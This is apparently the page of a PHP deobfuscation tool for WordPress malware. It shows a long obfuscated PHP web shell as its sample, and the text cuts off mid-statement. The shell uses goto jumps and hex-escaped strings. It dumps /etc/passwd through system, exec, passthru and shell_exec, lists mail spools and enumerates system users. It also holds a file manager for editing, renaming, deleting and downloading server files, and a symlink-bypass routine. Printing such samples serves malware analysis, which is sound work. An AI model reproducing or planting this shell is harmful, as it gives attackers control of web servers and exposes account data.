Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto LB30f; sUlgs: $default_action = "\x46\151\x6c\145\163\115\x61\156"; goto sI6zX; f2PCb: $web = $_SERVER["\x48\124\124\120\x5f\x48\117\x53\124"]; goto WRL5A; hw3d7: if ($_GET["\x61\x6b\163\x69"] == "\x70\141\x73\x73\x77\x62\171\x70\x61\x73\x73") { echo "\74\x64\151\x76\40\143\154\x61\x61\163\75\x22\143\157\x6e\164\x61\x69\x6e\145\x72\x22\76\12\x9\x9\11\x3c\x66\157\x72\x6d\40\x6d\x65\x74\x68\157\144\75\x22\x50\x4f\123\x54\42\76\12\x9\x9\x9\x9\x3c\x70\40\x63\154\x61\163\163\x3d\42\164\x65\x78\164\55\x63\145\156\164\145\x72\x22\x3e\102\x79\x70\141\163\163\x20\145\x74\x63\x2f\160\141\x73\163\167\x64\x20\127\x69\164\150\x20\x3a\x3c\x2f\160\76\12\11\11\x9\11\74\x64\x69\166\x20\143\154\x61\x73\x73\75\x22\x64\55\146\154\145\x78\40\x6a\165\163\164\151\x66\171\55\x63\157\x6e\164\x65\156\164\55\143\145\156\164\x65\162\x20\146\x6c\145\170\x2d\167\162\x61\160\42\x3e\xa\11\x9\x9\11\11\74\x69\156\x70\x75\x74\x20\164\x79\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\x22\x20\x63\154\x61\163\x73\x3d\x22\x66\x69\164\165\x72\145\40\142\164\156\x20\x62\x74\156\x2d\144\x61\x6e\x67\145\162\40\142\x74\156\55\163\x6d\42\x20\x76\x61\x6c\165\145\x3d\x22\123\x79\163\x74\x65\155\x20\x46\x75\156\x63\164\151\157\156\x22\40\x6e\141\x6d\145\75\x22\163\171\x73\164\x22\76\xa\11\x9\x9\11\11\x3c\151\156\160\165\164\40\164\171\x70\x65\x3d\x22\x73\x75\x62\155\x69\164\x22\x20\x63\x6c\141\163\163\75\x22\146\151\164\165\162\x65\x20\x62\x74\x6e\40\142\x74\156\55\144\141\156\x67\x65\x72\40\x62\x74\156\55\x73\x6d\42\x20\x76\x61\154\x75\x65\75\x22\120\141\x73\163\x74\x68\x72\x75\x20\x46\x75\x6e\x63\164\x69\x6f\156\x22\x20\x6e\141\155\145\x3d\42\160\141\x73\163\164\x68\x22\76\xa\11\x9\11\11\11\74\151\x6e\160\165\164\x20\164\171\160\145\75\42\163\x75\x62\x6d\x69\x74\42\x20\143\154\141\163\163\75\x22\146\x69\x74\165\162\x65\40\142\164\x6e\x20\142\164\156\55\144\x61\x6e\147\145\162\40\x62\x74\x6e\55\163\x6d\42\x20\166\x61\x6c\x75\145\x3d\42\105\x78\x65\143\x20\x46\165\156\x63\x74\x69\x6f\156\x22\x20\x6e\141\155\145\x3d\x22\x65\x78\42\76\xa\x9\x9\11\11\x9\x3c\x69\156\160\165\x74\x20\x74\171\160\145\x3d\x22\x73\165\x62\x6d\151\x74\x22\x20\x63\x6c\141\x73\x73\x3d\42\146\151\x74\x75\162\x65\40\142\164\x6e\x20\x62\164\x6e\55\x64\x61\x6e\x67\145\x72\x20\x62\164\156\55\163\155\42\x20\x76\x61\x6c\165\145\x3d\42\x53\x68\x65\x6c\x6c\x5f\145\x78\145\143\x20\x46\x75\x6e\143\164\151\157\156\x22\x20\156\x61\x6d\x65\75\x22\163\x68\x65\170\x22\76\xa\11\11\x9\11\11\x3c\x69\156\x70\165\164\40\164\x79\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\x20\x63\154\141\163\x73\x3d\x22\146\x69\x74\165\x72\145\40\x62\x74\156\40\x62\x74\x6e\55\144\141\156\147\145\x72\40\142\x74\x6e\x2d\163\x6d\x22\40\166\x61\x6c\x75\145\x3d\x22\120\x6f\163\151\170\x5f\x67\145\x74\x70\167\x75\151\x64\x20\106\x75\156\143\164\151\157\x6e\42\x20\156\141\x6d\145\x3d\x22\155\145\154\145\170\x22\76\12\11\x9\11\11\74\57\144\151\166\x3e\x3c\x68\162\x2f\x3e\12\11\11\x9\11\74\160\x20\143\x6c\x61\x73\163\x3d\x22\x74\x65\x78\x74\55\x63\x65\x6e\x74\145\x72\x22\x3e\x42\x79\x70\x61\x73\163\40\x55\x73\145\x72\x20\x57\x69\164\150\40\72\74\57\160\x3e\12\11\x9\11\11\74\x64\x69\166\40\x63\x6c\x61\163\x73\75\42\x64\x2d\146\x6c\x65\x78\40\x6a\165\163\164\151\146\171\x2d\x63\x6f\156\164\x65\x6e\164\x2d\143\145\156\x74\145\162\x20\x66\154\145\x78\x2d\x77\162\141\160\42\76\12\11\11\11\11\x9\x3c\x69\156\x70\165\x74\40\x74\171\x70\145\x3d\42\x73\165\x62\x6d\x69\164\x22\x20\x63\154\141\163\163\75\42\x66\151\x74\x75\x72\x65\x20\x62\x74\156\x20\x62\x74\156\55\167\141\x72\x6e\151\x6e\x67\40\x62\x74\156\x2d\163\155\x22\x20\x76\141\154\165\145\x3d\42\x41\167\153\40\x50\x72\157\x67\x72\141\155\x22\40\156\141\x6d\145\x3d\42\x61\167\x6b\x75\x73\145\x72\x22\76\12\11\x9\x9\11\x9\x3c\x69\156\x70\x75\164\40\164\x79\x70\x65\x3d\42\163\165\x62\155\151\x74\42\40\143\x6c\x61\163\163\x3d\x22\146\151\x74\x75\x72\145\40\x62\164\x6e\x20\x62\164\156\55\x77\x61\162\156\151\x6e\x67\40\x62\164\156\x2d\x73\155\x22\x20\166\141\x6c\165\x65\75\42\123\x79\163\x74\145\x6d\40\x46\x75\x6e\143\164\151\157\x6e\x22\40\156\x61\155\x65\75\x22\x73\x79\163\x74\x75\163\145\x72\42\76\12\11\11\x9\11\11\x3c\151\x6e\160\165\164\x20\x74\x79\x70\x65\x3d\x22\x73\x75\142\x6d\x69\164\42\40\x63\x6c\x61\x73\163\75\42\146\151\x74\x75\x72\145\x20\x62\x74\156\40\x62\x74\156\55\167\x61\162\156\x69\x6e\x67\40\x62\164\x6e\x2d\x73\155\x22\40\166\141\x6c\165\145\x3d\x22\120\141\163\163\x74\x68\162\x75\40\x46\x75\x6e\x63\164\x69\157\x6e\x22\x20\156\x61\x6d\145\x3d\x22\160\141\x73\163\x74\150\165\x73\x65\162\42\76\x9\xa\11\11\11\x9\x9\74\151\156\160\x75\164\x20\x74\171\x70\x65\x3d\42\163\165\142\x6d\151\164\x22\x20\x63\154\x61\163\x73\75\42\x66\151\x74\x75\162\x65\40\142\x74\x6e\x20\142\164\156\55\167\x61\x72\x6e\x69\156\147\x20\142\x74\156\x2d\163\155\x22\x20\166\141\154\x75\x65\x3d\42\105\170\145\x63\40\106\x75\x6e\x63\x74\151\157\156\x22\40\x6e\141\155\145\75\x22\145\170\165\x73\145\162\x22\x3e\x9\11\xa\x9\11\11\11\11\74\151\x6e\160\x75\x74\40\x74\171\x70\x65\75\x22\163\x75\x62\155\151\164\x22\40\x63\x6c\x61\163\x73\x3d\x22\146\x69\x74\165\x72\x65\x20\142\x74\x6e\40\142\164\156\x2d\167\x61\162\x6e\x69\x6e\147\40\x62\x74\156\55\x73\155\42\40\166\x61\154\x75\145\75\x22\x53\150\x65\x6c\154\x5f\x65\x78\x65\143\x20\x46\165\x6e\143\164\151\157\x6e\x22\x20\156\x61\x6d\x65\x3d\x22\x73\x68\x65\x78\x75\163\x65\162\x22\x3e\12\x9\x9\11\11\74\x2f\x64\151\x76\76\12\x9\x9\x9\74\57\x66\157\162\155\76"; $mail = "\x6c\163\x20\57\166\x61\x72\57\x6d\x61\x69\x6c"; $paswd = "\x2f\x65\x74\143\57\x70\141\163\163\167\x64"; if ($_POST["\163\x79\x73\x74"]) { echo "\x3c\164\x65\x78\164\x61\x72\x65\x61\40\x63\x6c\x61\x73\163\75\47\146\x6f\x72\x6d\x2d\143\157\156\x74\x72\157\x6c\x27\x20\x72\x6f\x77\163\75\47\x31\63\47\76"; echo system("\x63\x61\164\40{$paswd}"); echo "\x3c\x2f\164\x65\170\164\x61\x72\x65\141\76\74\142\x72\x2f\x3e"; } if ($_POST["\160\141\163\x73\x74\x68"]) { echo "\74\164\145\170\x74\x61\162\x65\141\40\x63\x6c\x61\163\x73\75\x27\146\x6f\162\x6d\x2d\x63\x6f\x6e\164\x72\x6f\154\x27\x20\x72\x6f\167\163\75\x27\x31\63\x27\x3e"; echo passthru("\143\141\x74\x20{$paswd}"); echo "\74\x2f\164\x65\x78\x74\x61\162\x65\141\76\74\142\162\x2f\76"; } if ($_POST["\145\170"]) { echo "\x3c\x74\145\x78\x74\141\162\x65\x61\40\143\x6c\141\x73\163\x3d\47\146\157\x72\155\55\143\157\x6e\164\x72\157\x6c\x27\x20\162\x6f\x77\x73\75\x27\61\63\47\76"; echo exec("\x63\141\164\40{$paswd}\x3b"); echo "\74\57\164\145\170\164\141\x72\145\x61\76\74\142\162\57\76"; } if ($_POST["\x73\x68\x65\x78"]) { echo "\74\x74\x65\x78\164\141\162\x65\x61\x20\x63\x6c\141\163\163\x3d\x27\x66\x6f\x72\x6d\55\143\x6f\156\164\x72\x6f\x6c\x27\x20\162\157\167\x73\x3d\47\x31\x33\47\76"; echo shell_exec("\143\141\164\40{$paswd}"); echo "\74\x2f\x74\x65\x78\x74\141\162\145\x61\x3e\74\x62\x72\57\x3e"; } if ($_POST["\155\145\x6c\145\x78"]) { echo "\74\164\x65\x78\x74\141\x72\145\x61\40\x63\154\x61\x73\163\75\x27\x66\x6f\162\155\x2d\143\x6f\156\x74\162\x6f\154\x27\40\162\x6f\x77\163\75\47\61\63\47\x3e"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}\72"; } print "\x6e"; } } echo "\x3c\x2f\x74\x65\170\x74\x61\x72\x65\141\x3e\x3c\x62\162\57\x3e"; } if ($_POST["\x61\167\x6b\x75\x73\x65\162"]) { echo "\74\x74\145\170\164\x61\162\x65\x61\40\143\x6c\141\163\x73\75\47\x66\x6f\162\x6d\55\x63\157\156\164\x72\157\x6c\x27\x20\x72\157\x77\163\75\x27\x31\x33\47\76\12\11\11\11\11" . shell_exec("\141\167\x6b\40\55\x46\x3a\40\47\x7b\40\160\x72\x69\156\164\x20\x24\61\40\175\47\x20{$paswd}\x20\174\40\163\157\x72\x74") . "\xa\11\11\x9\11\x3c\x2f\x74\x65\x78\x74\x61\x72\145\x61\76\x3c\x62\162\57\76"; } if ($_POST["\x73\171\x73\164\x75\163\x65\x72"]) { echo "\74\x74\145\x78\x74\141\162\x65\x61\x20\x63\154\141\x73\x73\75\x27\146\157\x72\x6d\55\x63\157\156\x74\x72\x6f\154\x27\40\162\x6f\x77\163\75\47\x31\x33\x27\x3e"; echo system("{$mail}"); echo "\74\x2f\x74\x65\x78\164\141\x72\x65\x61\x3e\x3c\142\162\x3e"; } if ($_POST["\160\x61\x73\x73\x74\150\x75\163\x65\162"]) { echo "\74\164\x65\170\164\141\x72\x65\141\x20\x63\154\x61\163\x73\75\x27\x66\x6f\x72\x6d\x2d\143\x6f\156\164\162\x6f\x6c\x27\x20\x72\x6f\167\163\x3d\x27\61\x33\47\76"; echo passthru("{$mail}"); echo "\x3c\x2f\164\145\170\164\x61\162\x65\141\76\x3c\142\x72\x3e"; } if ($_POST["\145\x78\x75\x73\x65\162"]) { echo "\74\x74\x65\x78\x74\141\x72\145\x61\x20\143\154\x61\x73\163\x3d\47\x66\x6f\162\x6d\55\143\x6f\x6e\x74\162\157\154\x27\x20\x72\x6f\x77\x73\x3d\x27\x31\x33\47\76"; echo exec($mail); echo "\x3c\x2f\x74\x65\x78\164\x61\x72\145\141\76\74\142\162\76"; } if ($_POST["\163\150\145\170\165\163\x65\162"]) { echo "\x3c\x74\145\x78\x74\141\x72\x65\141\40\x63\x6c\141\163\x73\75\47\x66\157\162\x6d\55\x63\157\x6e\x74\x72\157\x6c\47\40\x72\157\167\163\x3d\x27\61\63\47\76"; echo shell_exec("{$mail}"); echo "\x3c\57\164\145\170\164\x61\x72\145\141\x3e\74\142\x72\x3e"; } echo "\74\x2f\144\x69\x76\x3e"; die; } goto V40Ns; oqZvC: if (isset($_GET["\x64\x69\162"])) { $dir = $_GET["\144\x69\162"]; chdir($dir); } else { $dir = getcwd(); } goto k1N0A; n0tKq: foreach ($scandir as $file) { if (!is_file($path . "\57" . $file)) { continue; } $size = filesize($path . "\57" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\x4d\x42"; } else { $size = $size . "\x20\113\x42"; } echo "\x3c\164\162\76\12\11\11\x9\11\11\x9\74\164\144\76\74\151\x6d\147\x20\163\162\143\75\42"; $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if ($ext == "\160\x68\160") { echo "\x68\164\x74\x70\x73\72\x2f\57\151\x6d\141\147\x65\x2e\x66\154\x61\x74\x69\143\157\156\x2e\143\x6f\x6d\x2f\x69\x63\x6f\x6e\x73\57\x70\x6e\x67\57\61\62\70\x2f\63\x33\x37\57\63\x33\67\x39\64\x37\56\160\156\147\x22"; } elseif ($ext == "\x68\164\x6d\154") { echo "\x68\164\164\160\163\x3a\x2f\57\x69\155\x61\x67\x65\x2e\146\154\x61\164\151\143\157\x6e\x2e\x63\157\155\x2f\151\x63\x6f\x6e\x73\57\x70\x6e\x67\57\x31\x32\x38\57\61\63\66\57\x31\x33\66\65\62\x38\56\x70\x6e\x67\42"; } elseif ($ext == "\143\163\x73") { echo "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\155\141\147\145\56\x66\154\141\x74\x69\143\157\x6e\56\143\157\155\57\151\x63\x6f\156\163\57\x70\156\x67\x2f\61\x32\70\57\61\63\x36\57\x31\x33\66\x35\62\x37\56\x70\x6e\x67\42"; } elseif ($ext == "\160\156\147") { echo "\x68\x74\x74\160\163\x3a\x2f\x2f\x69\x6d\141\x67\x65\56\x66\x6c\141\164\151\143\x6f\156\x2e\x63\x6f\155\x2f\x69\143\x6f\156\x73\x2f\160\156\x67\x2f\61\x32\70\57\x31\63\66\x2f\61\63\x36\65\x32\x33\56\160\x6e\147\x22"; } elseif ($ext == "\x6a\x70\x67") { echo "\x68\x74\x74\x70\163\72\57\57\x69\155\x61\147\x65\x2e\x66\x6c\x61\164\151\143\157\156\x2e\x63\157\x6d\x2f\151\143\157\156\x73\57\160\156\147\x2f\61\62\x38\57\x31\63\x36\x2f\x31\x33\x36\x35\62\x34\x2e\x70\x6e\147\42"; } elseif ($ext == "\152\x70\145\147") { echo "\x68\x74\164\x70\72\x2f\57\x69\x2e\151\x6d\x67\x75\162\x2e\x63\x6f\x6d\57\x65\70\x6d\x6b\x76\120\x66\x2e\160\x6e\147\42"; } elseif ($ext == "\x7a\x69\160") { echo "\x68\x74\x74\160\x73\x3a\57\57\x69\155\x61\x67\145\x2e\146\154\141\x74\x69\143\x6f\156\x2e\143\x6f\x6d\57\151\143\157\x6e\163\57\160\x6e\147\x2f\x31\x32\70\x2f\61\63\66\57\61\63\x36\x35\x34\64\x2e\160\156\x67\x22"; } elseif ($ext == "\152\x73") { echo "\x68\164\164\x70\x73\x3a\57\57\x69\155\x61\x67\x65\x2e\146\154\141\164\151\143\x6f\x6e\x2e\x63\x6f\155\57\x69\x63\157\x6e\163\x2f\x70\156\147\x2f\x31\x32\70\x2f\x31\61\62\x36\57\61\61\62\66\70\x35\66\56\x70\156\x67"; } elseif ($ext == "\164\164\146") { echo "\150\164\164\x70\163\72\57\57\151\x6d\x61\x67\x65\56\x66\154\141\164\151\143\x6f\x6e\56\x63\x6f\155\57\x69\143\157\x6e\163\x2f\160\x6e\x67\x2f\61\x32\70\57\61\61\62\66\x2f\61\61\62\x36\x38\x39\62\56\x70\x6e\147"; } elseif ($ext == "\157\x74\146") { echo "\150\164\164\160\163\x3a\x2f\x2f\x69\155\141\147\x65\x2e\146\x6c\141\164\151\143\x6f\x6e\x2e\143\157\155\x2f\x69\x63\157\x6e\163\57\x70\156\147\57\x31\62\x38\x2f\61\61\x32\x36\57\61\61\x32\x36\70\x39\x31\56\160\156\x67"; } elseif ($ext == "\164\170\164") { echo "\150\164\164\160\x73\72\57\57\x69\155\141\147\x65\56\x66\x6c\x61\164\151\143\x6f\x6e\x2e\143\157\x6d\x2f\x69\x63\157\x6e\163\x2f\x70\156\147\57\61\x32\x38\x2f\x31\63\x36\57\x31\63\x36\65\63\x38\56\160\x6e\x67"; } elseif ($ext == "\151\x63\x6f") { echo "\150\164\x74\x70\163\x3a\x2f\x2f\151\155\x61\x67\145\56\x66\x6c\141\164\151\143\157\x6e\56\143\x6f\155\x2f\x69\x63\x6f\x6e\x73\x2f\x70\156\x67\57\x31\x32\x38\57\61\61\x32\x36\x2f\61\x31\62\x36\x38\x37\63\x2e\160\x6e\x67"; } elseif ($ext == "\143\157\156\146") { echo "\x68\x74\164\160\x73\x3a\x2f\x2f\151\155\141\x67\x65\56\146\x6c\x61\x74\x69\x63\x6f\156\x2e\x63\157\x6d\57\151\143\157\x6e\163\57\x70\156\x67\57\65\x31\62\57\61\65\67\x33\x2f\61\65\x37\63\63\60\61\56\x70\x6e\x67"; } elseif ($ext == "\x68\x74\141\x63\143\x65\x73\x73") { echo "\x68\x74\164\x70\x73\x3a\x2f\57\x69\155\x61\147\145\x2e\146\154\x61\164\151\x63\157\156\x2e\x63\157\x6d\x2f\x69\x63\157\156\x73\x2f\x70\x6e\147\x2f\61\x32\70\x2f\x31\67\x32\x30\x2f\61\x37\62\60\x34\64\64\x2e\x70\156\147"; } elseif ($ext == "\163\x68") { echo "\x68\x74\x74\x70\163\72\x2f\57\151\x6d\x61\147\145\56\146\x6c\141\164\x69\143\157\156\56\143\157\155\57\x69\143\x6f\x6e\163\x2f\x70\156\x67\57\61\62\x38\x2f\x36\61\x37\x2f\66\x31\67\x35\63\x35\x2e\x70\156\147"; } elseif ($ext == "\160\171") { echo "\150\x74\164\160\x73\72\x2f\x2f\151\x6d\141\x67\x65\56\x66\154\141\164\x69\x63\157\x6e\56\143\x6f\155\x2f\x69\143\x6f\156\163\57\160\x6e\x67\57\61\x32\70\x2f\61\70\x30\57\61\70\60\x38\66\67\x2e\160\156\x67"; } elseif ($ext == "\x69\x6e\144\x73\143") { echo "\x68\x74\164\x70\163\x3a\x2f\x2f\151\x6d\x61\147\x65\x2e\x66\154\x61\x74\151\x63\x6f\x6e\56\143\157\x6d\57\x69\x63\x6f\156\163\57\160\156\147\57\65\61\x32\x2f\x31\x32\66\x35\x2f\x31\62\x36\x35\x35\x31\x31\x2e\x70\x6e\147"; } elseif ($ext == "\x73\161\x6c") { echo "\x68\164\x74\160\x73\x3a\x2f\57\x69\x6d\147\56\151\x63\x6f\156\x73\x38\56\143\x6f\155\57\165\x6c\x74\162\141\166\151\157\x6c\x65\x74\x2f\62\x78\57\x64\141\164\141\x2d\143\x6f\156\146\x69\x67\x75\162\141\x74\x69\157\x6e\x2e\160\156\147"; } elseif ($ext == "\x70\154") { echo "\150\164\x74\x70\72\57\57\x69\56\151\x6d\x67\x75\x72\x2e\x63\157\155\x2f\x50\x6e\x6d\x58\70\110\x39\56\160\156\x67"; } elseif ($ext == "\x70\144\x66") { echo "\150\164\164\x70\x73\x3a\x2f\x2f\151\x6d\141\147\x65\56\x66\154\x61\x74\151\x63\x6f\x6e\56\143\x6f\155\x2f\151\143\157\156\x73\57\x70\156\147\57\61\x32\x38\x2f\61\63\66\x2f\x31\63\66\65\62\x32\56\x70\x6e\147"; } elseif ($ext == "\x6d\x70\x34") { echo "\150\164\x74\160\163\x3a\x2f\57\151\x6d\x61\147\x65\x2e\146\x6c\x61\164\151\x63\157\156\x2e\143\157\155\x2f\151\x63\x6f\x6e\163\x2f\x70\x6e\x67\57\x31\62\x38\x2f\61\x33\x36\57\x31\63\x36\x35\64\65\56\160\156\147"; } elseif ($ext == "\155\x70\63") { echo "\x68\164\x74\160\163\x3a\x2f\x2f\x69\x6d\x61\x67\145\x2e\x66\154\x61\x74\x69\143\157\x6e\56\x63\157\x6d\x2f\x69\143\x6f\156\163\x2f\160\x6e\x67\57\61\x32\70\57\x31\x33\66\x2f\61\63\x36\x35\x34\x38\56\160\x6e\147"; } elseif ($ext == "\147\x69\x74") { echo "\x68\x74\164\x70\163\x3a\57\57\151\155\141\x67\x65\x2e\x66\154\x61\164\x69\143\x6f\x6e\x2e\143\x6f\x6d\x2f\151\143\157\x6e\163\x2f\x70\156\x67\x2f\61\x32\70\57\x36\61\x37\x2f\66\x31\67\x35\x30\x39\x2e\x70\156\147"; } elseif ($ext == "\x6d\x64") { echo "\x68\164\164\x70\163\72\x2f\x2f\x69\x6d\141\147\x65\x2e\146\154\141\x74\x69\x63\157\x6e\56\x63\x6f\x6d\57\151\x63\157\x6e\x73\x2f\x70\x6e\147\57\x31\62\70\x2f\66\x31\67\x2f\x36\x31\67\x35\62\60\x2e\x70\x6e\147"; } else { echo "\x68\164\x74\160\x3a\57\x2f\x69\x63\x6f\x6e\x73\x2e\x69\143\x6f\156\x61\x72\x63\150\x69\166\145\56\143\157\x6d\57\151\143\x6f\x6e\x73\x2f\172\150\157\x6f\154\145\x67\157\x2f\x6d\x61\x74\145\x72\x69\x61\x6c\x2f\x32\65\66\57\x46\151\154\x65\164\x79\160\145\x2d\x44\157\x63\163\55\x69\143\x6f\156\x2e\x70\x6e\147"; } echo "\x22\x20\143\x6c\141\163\163\75\x22\x69\143\157\62\x22\x3e\x3c\x2f\151\x6d\x67\76"; if (strlen($file) > 25) { $_file = substr($file, 0, 25) . "\x2e\56\x2e\55\x2e" . $ext; } else { $_file = $file; } echo "\40\74\x61\x20\150\162\145\x66\x3d\42\x3f\144\151\162\x3d" . $path . "\46\141\153\x73\x69\x3d\x76\x69\x65\167\x26\146\151\154\145\x3d" . $path . "\x2f" . $file . "\x22\x3e" . $_file . "\x3c\x2f\x61\x3e\x3c\57\164\x64\x3e\xa\x9\11\x9\x9\x9\74\164\x64\40\143\154\141\x73\x73\75\x22\x74\145\170\x74\x2d\143\x65\156\164\145\x72\40\x64\55\x66\x6c\x65\170\42\76" . $size . "\74\x2f\x74\x64\76\12\11\x9\11\11\11\74\x74\x64\x3e\x3c\x61\x20\150\x72\x65\146\75\x22\x3f\144\x69\x72\x3d" . $path . "\46\141\x6b\x73\x69\75\143\150\155\x6f\x64\x26\146\151\x6c\145\x3d" . $path . "\x2f" . $file . "\x22\x20\x63\154\x61\163\163\x3d\42\164\145\170\164\55\x63\145\x6e\x74\145\162\x22\76"; if (is_writable($path . "\57" . $file)) { echo "\74\x66\x6f\x6e\x74\40\143\157\x6c\157\162\x3d\42\x23\x30\60\146\x66\60\x30\42\76"; } elseif (!is_readable($path . "\57" . $file)) { echo "\x3c\146\157\156\164\x20\143\x6f\x6c\157\x72\x3d\x22\162\x65\x64\42\x3e"; } echo perms($path . "\57" . $file); if (is_writable($path . "\x2f" . $file) || !is_readable($path . "\x2f" . $file)) { echo "\x3c\57\146\157\x6e\164\x3e\x3c\57\141\76\x3c\57\164\144\76\xa\x9\11\11\x9\x9\x3c\x74\144\x20\x63\154\141\x73\163\x3d\x22\x74\145\x78\x74\55\143\x65\x6e\164\145\162\x20\144\x2d\146\154\145\x78\x22\x3e\xa\11\x9\11\x9\x9\x9\x3c\x61\40\164\x69\164\x6c\145\x3d\42\114\151\150\141\x74\42\x20\143\154\141\x73\x73\x3d\42\142\141\x64\147\x65\40\x62\141\144\x67\x65\55\151\x6e\146\x6f\x22\x20\150\x72\145\146\75\42\x3f\x64\x69\x72\x3d" . $path . "\x26\x61\x6b\x73\151\x3d\166\x69\145\x77\x26\x66\x69\x6c\145\x3d" . $path . "\x2f" . $file . "\42\x3e\x26\x6e\142\x73\x70\x3b\x3c\151\x20\x63\154\141\x73\x73\75\42\x66\x61\40\x66\x61\55\145\x79\145\x22\76\x3c\x2f\x69\76\46\156\x62\163\160\x3b\74\57\141\76\46\x6e\142\163\x70\x3b\46\156\142\163\160\73\xa\11\x9\x9\x9\x9\x9\x3c\141\40\164\151\164\x6c\x65\x3d\x22\x45\x64\151\164\42\40\x63\x6c\141\x73\163\75\42\142\x61\x64\147\x65\x20\142\141\144\x67\x65\x2d\163\x75\143\143\145\x73\163\42\x20\x68\162\x65\x66\75\x22\x3f\x64\x69\x72\x3d" . $path . "\x26\x61\x6b\x73\x69\x3d\x65\144\x69\x74\46\146\151\x6c\x65\75" . $path . "\x2f" . $file . "\42\x3e\46\x6e\x62\x73\160\x3b\x3c\151\40\143\x6c\x61\163\163\75\42\x66\141\162\x20\146\x61\x2d\x65\x64\x69\x74\42\76\74\x2f\x69\76\46\x6e\142\163\160\x3b\x3c\x2f\x61\x3e\46\156\x62\163\160\73\46\x6e\x62\163\x70\73\xa\x9\x9\11\11\11\11\x3c\x61\x20\x74\x69\164\x6c\x65\75\x22\122\145\x6e\x61\155\145\x22\x20\x63\x6c\141\163\x73\x3d\x22\142\x61\144\x67\x65\40\x62\x61\x64\x67\145\55\163\165\143\x63\145\163\x73\42\40\150\162\x65\146\75\x22\77\x64\x69\162\x3d" . $path . "\46\141\x6b\x73\151\x3d\x72\145\156\141\155\x65\46\146\x69\x6c\x65\75" . $path . "\x2f" . $file . "\x22\x3e\46\x6e\142\x73\x70\x3b\74\151\40\143\x6c\x61\x73\163\75\x22\x66\141\40\146\x61\x2d\160\x65\156\x63\151\154\x22\76\x3c\57\151\x3e\46\156\142\163\160\x3b\74\x2f\x61\76\46\156\x62\x73\x70\73\x26\156\x62\163\x70\x3b\12\x9\x9\11\11\x9\11\74\141\x20\x63\154\x61\x73\x73\75\42\x62\141\144\x67\145\x20\x62\x61\x64\x67\145\55\x64\141\156\147\145\162\42\x20\150\162\x65\x66\75\x22\x3f\x64\151\162\75" . $path . "\46\141\153\x73\151\x3d\x68\x61\160\165\x73\146\x26\x66\151\154\x65\75" . $path . "\x2f" . $file . "\42\x20\x74\x69\164\154\x65\75\42\x44\145\154\x65\x74\145\42\76\46\x6e\142\x73\160\x3b\x3c\151\x20\x63\x6c\x61\163\x73\75\x22\146\x61\x20\x66\141\55\x74\162\x61\163\150\42\76\74\57\x69\76\46\x6e\142\163\160\73\74\x2f\x61\76\46\156\142\163\160\73\46\156\x62\x73\x70\x3b\12\11\11\11\x9\11\11\74\x61\40\143\x6c\x61\x73\x73\75\42\142\x61\144\x67\145\40\x62\141\144\147\x65\x2d\x70\x72\151\x6d\x61\162\x79\42\x20\150\162\145\146\75\42\x3f\46\144\x69\162\x3d" . $path . "\x26\x61\x6b\163\151\x3d\144\157\167\x6e\154\x6f\x61\x64\x26\x66\151\x6c\145\x3d" . $path . "\x2f" . $file . "\x22\x20\164\151\164\154\x65\75\x22\104\157\167\x6e\x6c\157\141\x64\x22\76\46\156\142\x73\160\x3b\x3c\151\40\x63\154\141\x73\x73\75\42\146\x61\x20\x66\141\55\x64\157\x77\156\x6c\x6f\x61\x64\x22\x3e\74\x2f\151\x3e\46\x6e\x62\x73\160\73\x3c\57\x61\x3e\12\x9\11\x9\11\x9\x3c\57\164\x64\76\12\x9\x9\x9\11\74\57\164\x72\76"; } } goto y7fjP; PoD22: if ($_GET["\141\x6b\163\151"] == "\163\171\x6d\x5f\x62\171\160\141\163") { if (isset($_GET["\163\x61\166\x65"]) and isset($_POST["\146\x69\x6c\145"]) or @filesize("\160\141\163\163\x77\x64\x2e\x74\x78\x74") > 0) { $cont = stripcslashes($_POST["\146\x69\x6c\x65"]); if (!file_exists("\160\x61\x73\x73\167\x64\56\x74\170\x74")) { $f = @fopen("\x70\x61\x73\163\x77\x64\x2e\x74\x78\x74", "\167"); $w = @fwrite($f, $cont); fclose($f); } if ($w or @filesize("\160\141\163\x73\x77\144\x2e\164\x78\164") > 0) { echo "\74\x64\151\x76\40\143\154\x61\163\163\x3d\x27\x74\155\x70\47\x3e\12\11\11\x9\11\x9\x3c\164\141\142\154\x65\x20\143\154\x61\163\x73\x3d\x27\x74\x65\170\164\x2d\143\145\156\x74\x65\x72\40\164\141\x62\x6c\x65\x2d\162\x65\x73\x70\x6f\156\163\151\x76\x65\47\76\12\x9\x9\11\x9\x9\x9\74\x74\150\x65\141\144\x20\x63\154\x61\x73\163\75\x27\x62\x67\55\151\x6e\x66\x6f\47\x3e\12\x9\11\11\x9\x9\11\11\74\x74\150\76\125\x73\x65\x72\163\x3c\57\164\x68\x3e\12\x9\11\x9\11\11\x9\x9\x3c\164\x68\76\x73\171\155\154\151\x6e\x6b\x3c\x2f\164\150\x3e\12\x9\11\x9\11\x9\11\11\74\164\150\76\106\124\120\74\57\x74\x68\x3e\xa\11\x9\11\11\11\11\x3c\57\164\x68\145\x61\144\x3e"; flush(); $fil3 = file("\160\x61\163\163\x77\x64\56\164\x78\164"); foreach ($fil3 as $f) { $u = explode("\x3a", $f); $user = $u["\60"]; echo 